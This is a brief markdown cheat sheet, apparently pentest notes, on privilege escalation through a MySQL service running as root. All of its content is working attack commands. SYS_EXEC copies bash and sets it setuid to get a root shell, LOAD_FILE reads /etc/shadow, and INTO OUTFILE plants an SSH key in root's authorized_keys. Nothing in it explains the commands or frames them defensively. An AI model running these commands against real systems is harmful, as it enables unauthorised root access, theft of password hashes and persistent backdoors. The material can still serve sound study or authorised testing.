# Privesc

Privelege Escalation.

## Service running as root

### MySQL

```sql
SELECT SYS_EXEC('cp /bin/bash /tmp/bash');
SELECT SYS_EXEC('chmod u+s /tmp/bash');
$ /tmp/bash -p

SELECT LOAD_FILE('/etc/shadow');

SELECT 'ssh-rsa ...' INTO OUTFILE '/root/.ssh/authorized_keys';
```
